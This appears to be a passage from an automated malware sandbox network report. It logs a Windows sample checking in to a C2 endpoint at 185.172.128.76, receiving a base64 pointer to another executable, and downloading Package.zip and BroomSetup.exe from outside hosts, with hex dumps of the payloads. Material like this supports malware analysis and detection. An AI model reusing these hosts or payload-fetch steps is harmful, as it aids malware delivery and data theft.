                                                                                                                                                                                                                            Apr 26, 2024 23:09:39.564052105 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:09:39 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 26, 2024 23:09:40.451756954 CEST469OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----GCGHJEBGHJKEBFHIJDHC
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 268
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 32 33 35 66 30 35 62 66 64 64 65 38 66 61 33 66 61 33 65 65 66 30 64 66 38 63 61 39 34 36 37 62 66 61 65 33 31 36 31 62 34 65 61 64 33 32 63 31 32 34 66 37 63 32 36 37 34 66 32 36 65 35 65 36 33 39 34 32 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 68 65 72 37 68 34 38 72 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 2d 2d 0d 0a
                                                                                                                                                                                                                            Data Ascii: ------GCGHJEBGHJKEBFHIJDHCContent-Disposition: form-data; name="token"0235f05bfdde8fa3fa3eef0df8ca9467bfae3161b4ead32c124f7c2674f26e5e63942ecb------GCGHJEBGHJKEBFHIJDHCContent-Disposition: form-data; name="message"her7h48r------GCGHJEBGHJKEBFHIJDHC--
                                                                                                                                                                                                                            Apr 26, 2024 23:09:40.825534105 CEST223INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:09:40 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 52
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 34 4e 53 34 78 4e 7a 49 75 4d 54 49 34 4c 6a 49 77 4d 79 39 30 61 57 74 30 62 32 73 75 5a 58 68 6c 66 44 42 38 4d 48 78 38
                                                                                                                                                                                                                            Data Ascii: aHR0cDovLzE4NS4xNzIuMTI4LjIwMy90aWt0b2suZXhlfDB8MHx8


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            4192.168.2.449734176.97.76.106807004C:\Users\user\Desktop\wxfSIz4PAi.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Apr 26, 2024 23:08:59.852603912 CEST185OUTGET /1/Package.zip HTTP/1.1
                                                                                                                                                                                                                            Host: note.padd.cn.com
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                                                                                                                                                                                                                            Apr 26, 2024 23:09:00.118778944 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 20:53:40 GMT
                                                                                                                                                                                                                            Content-Type: application/zip
                                                                                                                                                                                                                            Content-Length: 3884863
                                                                                                                                                                                                                            Last-Modified: Wed, 24 Apr 2024 05:45:46 GMT
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            ETag: "66289c8a-3b473f"
                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            Data Raw: 50 4b 03 04 14 00 00 00 08 00 0b 3f 98 58 ef da 8c 80 dd c7 12 00 09 49 14 00 09 00 00 00 62 75 6e 63 68 2e 64 61 74 5c 5d 87 a2 aa 3a 16 cd af 89 8a 20 22 2a 16 10 05 54 ec 15 1b fa f7 b3 d6 4e 3c 77 66 bc ef 58 20 24 3b bb 65 b7 e4 29 a5 ac 9e af 7c 75 5d 2b bc a6 ca 55 2a 56 ea a9 7e af 81 db 9b bd d4 66 da 52 6a 65 f7 f5 b5 1d fe 1a b5 40 f5 66 f8 72 c0 df 56 0d 95 da 17 4a 2d f0 23 55 bd e7 b3 b7 bc 2a b5 de ab 3d ba 54 13 f5 45 13 35 cc 94 5a fa e3 83 aa 26 b5 9e 7a cf 95 fa f4 27 18 6b a2 8e 25 9e cb 4a 65 a9 cb 85 03 dc d4 5b 35 1e e8 cd c6 8f f7 50 c5 db 85 42 7f b5 19 40 05 ac f3 07 2e bf d4 e9 96 a8 47 eb fc 7a 5b 2a 8f 2d 42 31 e2 c3 ce d0 4a 7a 23 0c a9 ce d7 25 de bb 4a b1 fb a6 6a 06 0f d5 57 f5 a4 0e 18 af b5 00 1d 3e 36 32 eb 6a 4b 28 95 bc 0d d4 f1 a3 1a a1 9a c4 a5 02 84 45 b4 54 c9 51 7d d6 6a dd 5f 49 8b 8e 52 ee 54 45 6a a3 3e d2 f1 8b 4f c6 2a 99 3a 4a 25 6f a5 da aa 18 02 8b ec aa a6 b2 60 82 66 2b 4f a9 d6 1c 57 3e 15 87 c0 a3 dd 53 8e 49 4e 43 f5 6d ab 36 be a9 7c 77 51 bb [TRUNCATED]
                                                                                                                                                                                                                            Data Ascii: PK?XIbunch.dat\]: "*TN<wfX $;e)|u]+U*V~fRje@frVJ-#U*=TE5Z&z'k%Je[5PB@.Gz[*-B1Jz#%JjW>62jK(ETQ}j_IRTEj>O*:J%o`f+OW>SINCm6|wQxkKoD:n4P>*M_|PR@gWkXMbMH #oCC!1!RgQc "PQ3HBF|)@W6Z79d'`_6zr%a*7,.l.hvPOf!Y#Y7gv=kJN#\5]<VGU~,Xok.#?v%0+m(mahJG>mVkbBjXV$p ?<^%KA=0\(Ql>;x#W@@tIU Q/e7Ew}h^N +bRz2rfu'os}1j{'%?ZM9.|PWoc3H\4B;1465Q324$2(9j!$<<P#bLjDvG+}T6tRb"ofh>*Z5(]
                                                                                                                                                                                                                            Apr 26, 2024 23:09:00.118791103 CEST1289INData Raw: 9e eb 93 5a 97 53 4c ea 1d 6a 03 c2 62 55 39 25 62 42 ae d3 fa 42 88 fb 27 a8 43 b2 49 31 c3 44 5b ca ba aa 00 34 12 88 ca b9 5f 02 ba 75 fa 98 e6 aa 99 b6 d8 3a 3a ef 40 87 6c d7 24 a1 82 22 2e a6 95 3a 3b ba a7 69 a9 6a a6 7f 61 eb 16 d7 24 8a
                                                                                                                                                                                                                            Data Ascii: ZSLjbU9%bBB'CI1D[4_u::@l$".:;ija$(i2_NXj&4Uh{"~2ReWhP<U0 ~pSM4G?wNx/OVcyb:kW!b'BF*s}f{'L)cz9A0`$zTN1
                                                                                                                                                                                                                            Apr 26, 2024 23:09:00.118803024 CEST1289INData Raw: 91 e8 d4 4f 64 fd 25 3f c7 5c b6 02 a1 e3 62 97 c5 b4 36 30 5c 0f 0b a4 95 e2 4b f3 20 8b ae 74 0a d8 6f 64 c9 cd 0f 89 fb de 6f fc ee 08 20 10 e8 db 99 62 ec 25 9c 25 99 27 b2 b4 24 0c f1 b9 97 af 0f 68 ef 8d 2f cf 5f 68 0e ba fe 1c 0c ff 7d 3c
                                                                                                                                                                                                                            Data Ascii: Od%?\b60\K todo b%%'$h/_h}<?\Z7V6]m!Nm(H|Im8z*n2jk)jPE/d\_r_"R:j4J\CsyuXx3tS9V;*,.|j\[S
                                                                                                                                                                                                                            Apr 26, 2024 23:09:00.118814945 CEST1289INData Raw: 16 d3 e9 46 6e ba ef 9e 3e ac 87 cb 48 1b 8b 1b e2 6e 6b f7 dd 08 4c 39 c4 34 5e c7 86 4d 0e 9b cf 71 d7 69 4c 55 b7 78 9e 89 67 31 89 95 56 76 27 82 62 77 47 32 48 54 a5 75 d1 bb f3 1d 92 03 63 60 f8 fd e3 ff 91 d6 3d dd 13 b9 b9 73 37 31 97 f5
                                                                                                                                                                                                                            Data Ascii: Fn>HnkL94^MqiLUxg1Vv'bwG2HTuc`=s71(g{qT-#ulNjR:Om@,kfCgsl WEO1lj$z?kLUhPA8XvqbP~iwY2.y\W=1Wq0O}Rl
                                                                                                                                                                                                                            Apr 26, 2024 23:09:00.118828058 CEST1289INData Raw: e1 8d 3e ea ea fb 97 aa 06 3c ad 0a 8f f7 90 2a ca 3a 58 17 34 2e 60 db f4 ce 19 bb 1b 3d d4 b1 15 8a 22 f2 ef 2b 50 21 c1 04 c8 60 9f ba 70 95 bc 1d 95 3b 4b 05 45 2e 89 7c 18 6c 94 7f c0 2f de 2f b4 4e 9c b6 90 6d 9c b4 d5 9d 0d c4 f0 bf c7 9a
                                                                                                                                                                                                                            Data Ascii: ><*:X4.`="+P!`p;KE.|l//Nmnkk&z'74<RY>y=O+MDcSo@x 9c;>-{];@G\{?];[Peqpq=Iqa5`D_AP_GU3[_|gYA#*8
                                                                                                                                                                                                                            Apr 26, 2024 23:09:00.118840933 CEST1289INData Raw: 03 fc cc 1a 92 a0 9d cc 8c 39 c4 b5 34 53 ef 8f ac 49 03 e5 36 a9 6a e7 87 3c e7 54 4e cb 6d 1f d6 0d 6f ed c9 9e e1 e6 ec 91 bf 6b 6a 91 3e cb f1 02 2a e9 eb ac d4 5f ba 11 a4 85 50 ae f5 fa 37 21 1c 57 76 b7 7d 21 ec 4b 32 0f 40 c9 12 33 1e 43
                                                                                                                                                                                                                            Data Ascii: 94SI6j<TNmokj>*_P7!Wv}!K2@3Cs*-<HIo5 Q0V?4v^i2D5v$ip^`RLK$*.0 ^wS~W _h*:JIEE;/?j8-
                                                                                                                                                                                                                            Apr 26, 2024 23:09:00.118853092 CEST1289INData Raw: 23 92 12 a8 ed ec 3a 23 5c c7 33 cd bc 07 1c 47 cf e6 44 fb 2d e3 53 62 a2 58 17 50 1f ac 0c 92 e1 77 b6 56 b3 ba 3a 06 37 24 d5 e2 4d 74 20 4a 83 6e c1 29 9f 67 8b c1 47 5d a4 54 73 8e aa ea 13 c3 23 cc 3c 18 d3 39 ed 82 06 8b b6 ee 95 3b 16 f8
                                                                                                                                                                                                                            Data Ascii: #:#\3GD-SbXPwV:7$Mt Jn)gG]Ts#<9;1xr5:StLE8:ihFtT%X(]d-nS(W!(.vwpv.[E%AdOZguvYHGv:u\6sEaXu6;\.*
                                                                                                                                                                                                                            Apr 26, 2024 23:09:00.118868113 CEST1289INData Raw: 26 77 2e 9f 11 1f dc c1 ba f5 4f a2 64 c7 94 86 7a 5b 8f bd 8a d0 3a 30 6e e3 7e 84 38 e6 10 7d 0d c4 e3 5d c7 eb b1 98 15 a5 59 c1 e0 e0 a1 be 3e 69 cf ba 61 6a 92 e0 3b 99 7f 83 14 9a 8b f3 12 5f 4b 28 4a 28 cd c3 63 81 59 6e ed d7 e1 53 53 4d
                                                                                                                                                                                                                            Data Ascii: &w.Odz[:0n~8}]Y>iaj;_K(J(cYnSSM2UXf2&3mtvaj8;X!_/dlI8u1J/919FI41iD:5-^kq).ptGO4B?
                                                                                                                                                                                                                            Apr 26, 2024 23:09:00.118881941 CEST1289INData Raw: 00 cc 0a 32 de db 68 03 5c d7 9a 0f ef b0 e7 c6 b2 54 5e 80 d7 df 8b ec ce 42 f0 54 5a fe fc 02 eb 50 7b b8 40 bb a5 87 16 e1 d3 25 f1 f3 d0 bf ac f8 7b 4a 2e d1 42 f0 9a cc 7c 6e fe 24 14 e7 3d ea fe 36 1b 69 9b 63 f8 63 36 25 8e 5a fd b3 78 eb
                                                                                                                                                                                                                            Data Ascii: 2h\T^BTZP{@%{J.B|n$=6icc6%Zxn1#]|D;Scv\f-!jID\$[V=!k%cpOSvu'p.B1z3z+L:4Y7U'g`
                                                                                                                                                                                                                            Apr 26, 2024 23:09:00.118895054 CEST1289INData Raw: 70 ec 91 9e 1a b6 f3 5f 25 dc f4 9b bb ac 07 63 42 0f 8f 1e 65 67 df 33 2d d4 fe c1 55 6c 20 fa 23 42 7c ce 66 ad 52 a3 fe 0a 1a 7e ae 37 c5 8c cc 51 67 6a f7 cd 70 5c d0 66 72 69 6f 08 57 5f 4e 81 f1 e9 c4 eb a2 a5 df f6 cc b5 e7 51 ae 56 b8 25
                                                                                                                                                                                                                            Data Ascii: p_%cBeg3-Ul #B|fR~7Qgjp\frioW_NQV%#p&osj}(K^"ea/go6&v3\o{Mh3XqAOsrabEtU_P?a#sn9y3u@(T]hN5NPT#hM
                                                                                                                                                                                                                            Apr 26, 2024 23:09:00.384146929 CEST1289INData Raw: db 4d 87 6f fe 6d d4 ff 76 19 6e e6 d5 95 f5 08 7f 96 68 9f cf a1 4b f3 42 8e 7e c5 60 5d fa 32 76 eb b8 3d e7 fe a6 b5 ef 88 7a 69 90 a1 07 6d 40 ca 4d ad 2f f1 0f 46 61 32 9a 7c 9c bf 64 11 6f b6 a4 1a b0 1d 9d 1d 76 3e e4 76 85 e0 ad ef 6b be
                                                                                                                                                                                                                            Data Ascii: MomvnhKB~`]2v=zim@M/Fa2|dov>vk3#qLj[G?&e<kl*9SA/vS/DMLaNjF[3);<g*2<pUyru{){N8gk{>|=r2WRBL]+=K


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            5192.168.2.449735185.172.128.228807004C:\Users\user\Desktop\wxfSIz4PAi.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Apr 26, 2024 23:09:09.366799116 CEST185OUTGET /BroomSetup.exe HTTP/1.1
                                                                                                                                                                                                                            Host: 185.172.128.228
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                                                                                                                                                                                                                            Apr 26, 2024 23:09:09.606708050 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:09:09 GMT
                                                                                                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                            Last-Modified: Fri, 15 Mar 2024 11:59:56 GMT
                                                                                                                                                                                                                            ETag: "4a4030-613b1bf118700"
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            Content-Length: 4866096
                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                            Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 84 e1 90 58 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 c4 35 00 00 50 14 00 00 00 00 00 60 d5 35 00 00 10 00 00 00 e0 35 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 [TRUNCATED]
                                                                                                                                                                                                                            Data Ascii: MZP@!L!This program must be run under Win32$7PELX5P`55@J`J@7N<J0(08 878.texth55 `.itext<=5>5 `.dataV5X5@.bssm@7 7.idataN7P 7@.didata8p7@.tls@8z7.rdata 8z7@@.reloc08|7@B.rsrc<<@@JJ@@ [TRUNCATED]
                                                                                                                                                                                                                            Apr 26, 2024 23:09:09.606787920 CEST1289INData Raw: 61 6e 01 00 00 00 00 01 00 00 00 00 10 40 00 05 46 61 6c 73 65 04 54 72 75 65 06 53 79 73 74 65 6d 02 00 00 00 34 10 40 00 02 08 41 6e 73 69 43 68 61 72 01 00 00 00 00 ff 00 00 00 02 00 00 00 00 50 10 40 00 09 04 43 68 61 72 03 00 00 00 00 ff ff
                                                                                                                                                                                                                            Data Ascii: an@FalseTrueSystem4@AnsiCharP@Charh@ShortInt@SmallInt@Integer@Byte@Word@Pointer@
                                                                                                                                                                                                                            Apr 26, 2024 23:09:09.606811047 CEST1289INData Raw: 74 72 69 65 73 02 00 02 00 00 00 00 24 15 40 00 0e 07 54 4d 65 74 68 6f 64 08 00 00 00 00 00 00 00 00 02 00 00 00 e4 10 40 00 00 00 00 00 02 04 43 6f 64 65 02 00 e4 10 40 00 04 00 00 00 02 04 44 61 74 61 02 00 02 00 06 00 0b 94 7f 40 00 0c 26 6f
                                                                                                                                                                                                                            Data Ascii: tries$@TMethod@Code@Data@&op_Equality@ @Left @Right@&op_Inequality@ @Left @Right@&op_GreaterThan@ @Left @Right@&o
                                                                                                                                                                                                                            Apr 26, 2024 23:09:09.606843948 CEST1289INData Raw: 73 73 02 00 02 00 3b 00 20 85 40 00 0d 4d 65 74 68 6f 64 41 64 64 72 65 73 73 03 00 e4 10 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 12 e4 11 40 00 01 00 04 4e 61 6d 65 02 00 02 00 3b 00 a4 85 40 00 0d 4d 65 74 68 6f 64 41 64 64 72
                                                                                                                                                                                                                            Data Ascii: ss; @MethodAddress@Self@Name;@MethodAddress@Self@NameF@MethodName@Self@Address@@=L~@QualifiedClassName@Self@
                                                                                                                                                                                                                            Apr 26, 2024 23:09:09.606868982 CEST1289INData Raw: 63 65 00 00 00 00 01 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 06 53 79 73 74 65 6d 03 00 ff ff 02 00 00 00 50 1f 40 00 0f 0b 49 45 6e 75 6d 65 72 61 62 6c 65 18 1f 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 53 79 73 74 65
                                                                                                                                                                                                                            Data Ascii: ceFSystemP@IEnumerable@System@IDispatch@FSystemD$UD$sD$@@@F@@\ @@<!@\
                                                                                                                                                                                                                            Apr 26, 2024 23:09:09.606880903 CEST1289INData Raw: 40 00 01 00 00 00 00 02 00 3c 24 40 00 14 09 50 56 61 72 41 72 72 61 79 50 24 40 00 02 00 00 00 00 54 24 40 00 0e 09 54 56 61 72 41 72 72 61 79 18 00 00 00 00 00 00 00 00 06 00 00 00 cc 10 40 00 00 00 00 00 02 08 44 69 6d 43 6f 75 6e 74 02 00 cc
                                                                                                                                                                                                                            Data Ascii: @<$@PVarArrayP$@T$@TVarArray@DimCount@Flags@ElementSize@LockCount@Data$@Bounds$@TVarRecord@PRecord@RecI
                                                                                                                                                                                                                            Apr 26, 2024 23:09:09.606914997 CEST1289INData Raw: 41 00 f4 ff 24 2c 40 00 43 00 f4 ff 5a 2c 40 00 43 00 f4 ff a5 2c 40 00 43 00 f4 ff d9 2c 40 00 43 00 f4 ff 3b 2d 40 00 43 00 f4 ff 9d 2d 40 00 43 00 f4 ff ff 2d 40 00 43 00 f4 ff 61 2e 40 00 43 00 f4 ff c3 2e 40 00 43 00 f4 ff 25 2f 40 00 43 00
                                                                                                                                                                                                                            Data Ascii: A$,@CZ,@C,@C,@C;-@C-@C-@Ca.@C.@C%/@C/@C/@CK0@C0@C1@Cq1@C1@C52@C2@C2@C;3@C~3@C3@C4@CE4@C4@C4@C=5@C5@C5@C
                                                                                                                                                                                                                            Apr 26, 2024 23:09:09.606947899 CEST1289INData Raw: 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 30 e4 40 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 d0 41 40 00 01 00 03 53 72 63 02 00 00 9c 10
                                                                                                                                                                                                                            Data Ascii: StartIndex@Countb0@CopySelfA@Src@StartIndex'@Dest@Countb@CopySelf'@SrcA@Dest@StartIndex@Countb@Copy
                                                                                                                                                                                                                            Apr 26, 2024 23:09:09.606997013 CEST1289INData Raw: 36 03 00 80 10 40 00 08 00 03 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 9c 27 40 00 01 00 03 50 74 72 02 00 00 54 11 40 00 02 00 03 4f 66 73 02 00 02 00 43 00 d4 e8 40 00 09 52 65 61 64 49 6e 74 33 32 03 00 9c 10 40 00 08 00 03 00 00 00 00 00
                                                                                                                                                                                                                            Data Ascii: 6@Self'@PtrT@OfsC@ReadInt32@Self'@PtrT@OfsC@ReadInt64@Self'@PtrT@OfsA@ReadPtr'@Self'@PtrT@
                                                                                                                                                                                                                            Apr 26, 2024 23:09:09.607007980 CEST1289INData Raw: 00 00 00 00 04 53 65 6c 66 02 00 01 00 00 00 00 01 00 05 56 61 6c 75 65 02 00 02 00 3e 00 78 ea 40 00 11 41 6c 6c 6f 63 53 74 72 69 6e 67 41 73 41 6e 73 69 03 00 9c 27 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 b8 12 40 00 01 00
                                                                                                                                                                                                                            Data Ascii: SelfValue>x@AllocStringAsAnsi'@Self@StrP@AllocStringAsAnsi'@Self@Str@CodePageA@AllocStringAsUnicode'@Self@Str<l@A
                                                                                                                                                                                                                            Apr 26, 2024 23:09:09.846549034 CEST1289INData Raw: 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 9c 27 40 00 01 00 03 50 74 72 02 00 02 b8 12 40 00 02 00 05 56 61 6c 75 65 02 00 00 9c 10 40 00 0c 00 0f 4d 61 78 43 68 61 72 73 49 6e 63 4e 75 6c 6c 02 00 00 cc 10 40 00 08 00 08 43 6f 64 65 50 61 67 65
                                                                                                                                                                                                                            Data Ascii: Self'@Ptr@Value@MaxCharsIncNull@CodePages@WriteStringAsAnsiSelf'@PtrT@Ofs@Value@MaxCharsIncNull@WriteStringAsAnsiS


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            6192.168.2.44973920.157.87.45803428C:\Users\user\AppData\Local\Temp\u5ek.3.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Apr 26, 2024 23:09:13.491075993 CEST266OUTPOST /__svc/sbv/DownloadManager.ashx HTTP/1.0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Content-Length: 300
                                                                                                                                                                                                                            Host: svc.iolo.com
                                                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                            User-Agent: Mozilla/3.0 (compatible; Indy Library)
                                                                                                                                                                                                                            Apr 26, 2024 23:09:13.732300997 CEST300OUTData Raw: 2f 65 5a 42 73 2b 42 6c 51 46 58 71 30 59 64 4b 4f 31 72 57 47 6b 67 6a 65 44 4b 4a 4a 32 7a 4e 41 34 53 38 48 69 44 55 4c 56 41 66 46 76 61 45 49 51 2b 2f 6c 33 6e 69 78 46 78 62 4d 79 2b 36 32 6f 73 72 64 32 2b 64 57 65 6e 6f 6b 77 76 6c 48 62
                                                                                                                                                                                                                            Data Ascii: /eZBs+BlQFXq0YdKO1rWGkgjeDKJJ2zNA4S8HiDULVAfFvaEIQ+/l3nixFxbMy+62osrd2+dWenokwvlHbQ3q8eV0Qx+sRVrwIuOdpxbCQ6/gpdrdPc0dPp2yFiTtXpXLFc20MMPt736DHHnFUtB8RByJnUp0u2/VdqgLICfLL1rJJAjFmZqgUei5EZzhfnEiR5dqfQ3Z0YLnFtVOWwMFg4lvwpMiNrtOx5Ld+YvOlUKSq2A7tC
                                                                                                                                                                                                                            Apr 26, 2024 23:09:14.354841948 CEST469INHTTP/1.1 200 OK
                                                                                                                                                                                                                            cache-control: private
                                                                                                                                                                                                                            content-length: 256
                                                                                                                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                                                                                                                            x-whom: Ioloweb5
                                                                                                                                                                                                                            date: Fri, 26 Apr 2024 21:09:13 GMT
                                                                                                                                                                                                                            set-cookie: SERVERID=svc5; path=/
                                                                                                                                                                                                                            connection: close
                                                                                                                                                                                                                            Data Raw: 31 33 32 62 68 5a 33 4d 56 38 47 36 64 71 53 38 4c 68 46 6d 33 71 59 50 6f 4a 44 73 46 59 47 5a 70 75 54 32 2b 37 36 66 6f 6e 75 4b 30 71 57 64 75 67 30 6b 30 70 75 48 51 4a 2f 66 61 70 67 77 74 64 4f 58 51 72 79 6c 55 6c 2f 68 70 6c 34 34 77 75 67 69 4f 32 2f 4b 6d 7a 6f 53 4c 72 54 45 55 6f 48 62 4d 42 42 67 31 47 54 69 4e 4e 32 63 6d 75 6d 50 77 44 71 31 6d 6a 77 55 37 4e 53 74 5a 6b 6c 61 2b 58 79 47 77 54 6e 78 65 43 69 2b 4e 4d 45 63 47 70 31 32 65 33 6f 70 53 41 39 50 4a 46 62 53 5a 36 38 53 45 41 4c 54 76 7a 4f 7a 30 53 30 42 6a 6f 4c 65 42 30 6a 63 5a 36 45 54 63 6f 77 4e 31 2f 58 32 4b 70 7a 78 31 48 54 4c 69 70 4b 4b 76 30 54 52 58 32 6b 49 67 44 35 52 30 6c 4d 6b 61 4c 6b 6c 6d 7a 6c 6f 54 64 4c 47 7a 35 6c 79 45 65 4a 6e 66 79 53 76 79 4d 66 32
                                                                                                                                                                                                                            Data Ascii: 132bhZ3MV8G6dqS8LhFm3qYPoJDsFYGZpuT2+76fonuK0qWdug0k0puHQJ/fapgwtdOXQrylUl/hpl44wugiO2/KmzoSLrTEUoHbMBBg1GTiNN2cmumPwDq1mjwU7NStZkla+XyGwTnxeCi+NMEcGp12e3opSA9PJFbSZ68SEALTvzOz0S0BjoLeB0jcZ6ETcowN1/X2Kpzx1HTLipKKv0TRX2kIgD5R0lMkaLklmzloTdLGz5lyEeJnfySvyMf2


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            7192.168.2.44975520.157.87.45803428C:\Users\user\AppData\Local\Temp\u5ek.3.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Apr 26, 2024 23:09:40.608616114 CEST266OUTPOST /__svc/sbv/DownloadManager.ashx HTTP/1.0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Content-Length: 300
                                                                                                                                                                                                                            Host: svc.iolo.com
                                                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                            User-Agent: Mozilla/3.0 (compatible; Indy Library)
                                                                                                                                                                                                                            Apr 26, 2024 23:09:40.848504066 CEST300OUTData Raw: 2f 65 5a 42 73 2b 42 6c 51 46 58 71 30 59 64 4b 4f 31 72 57 47 6b 67 6a 65 44 4b 4a 4a 32 7a 4e 41 34 53 38 48 69 44 55 4c 56 41 74 69 53 56 57 6f 48 52 30 44 67 2b 47 4d 38 61 53 79 38 54 4c 32 6f 73 72 64 32 2b 64 57 65 6e 6f 6b 77 76 6c 48 62
                                                                                                                                                                                                                            Data Ascii: /eZBs+BlQFXq0YdKO1rWGkgjeDKJJ2zNA4S8HiDULVAtiSVWoHR0Dg+GM8aSy8TL2osrd2+dWenokwvlHbQ3q8eV0Qx+sRVrwIuOdpxbCQ6/gpdrdPc0dPp2yFiTtXpXLFc20MMPt736DHHnFUtB8RByJnUp0u2/VdqgLICfLL1rJJAjFmZqgUei5EZzhfnEiR5dqfQ3Z0YLnFtVOWwMFg4lvwpMiNrtOx5Ld+YvOlUKSq2A7tC
                                                                                                                                                                                                                            Apr 26, 2024 23:09:41.081576109 CEST405INHTTP/1.1 200 OK
                                                                                                                                                                                                                            cache-control: private
                                                                                                                                                                                                                            content-length: 192
                                                                                                                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                                                                                                                            x-whom: Ioloweb9
                                                                                                                                                                                                                            date: Fri, 26 Apr 2024 21:09:39 GMT
                                                                                                                                                                                                                            set-cookie: SERVERID=svc9; path=/
                                                                                                                                                                                                                            connection: close
